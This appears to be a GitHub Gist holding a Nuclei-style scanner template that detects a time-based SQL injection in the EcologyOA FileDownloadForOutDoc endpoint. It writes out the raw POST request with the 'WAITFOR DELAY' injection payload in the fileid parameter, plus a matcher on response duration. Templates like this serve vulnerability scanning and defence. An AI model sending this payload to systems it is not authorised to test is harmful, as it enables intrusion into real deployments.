Created
December 25, 2023 18:40
-
-
Save ifconfig-me/4d0fc650932c50f6c2ca3d8faefada36 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: ecology-oa-filedownloadforoutdoc-sqli | |
info: | |
name: EcologyOA filedownloadforoutdoc - SQL injection | |
author: unknown | |
severity: critical | |
description: EcologyOA filedownloadforoutdoc interface has SQL injection | |
tags: ecology-oa,sqli | |
requests: | |
- raw: | |
- | | |
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 | |
Host: {{Hostname}} | |
Accept: */* | |
Accept-Encoding: gzip, deflate | |
Accept-Language: zh-CN,zh;q=0.9 | |
Connection: close | |
fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1 | |
matchers: | |
- type: dsl | |
dsl: | |
- 'duration>=5' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment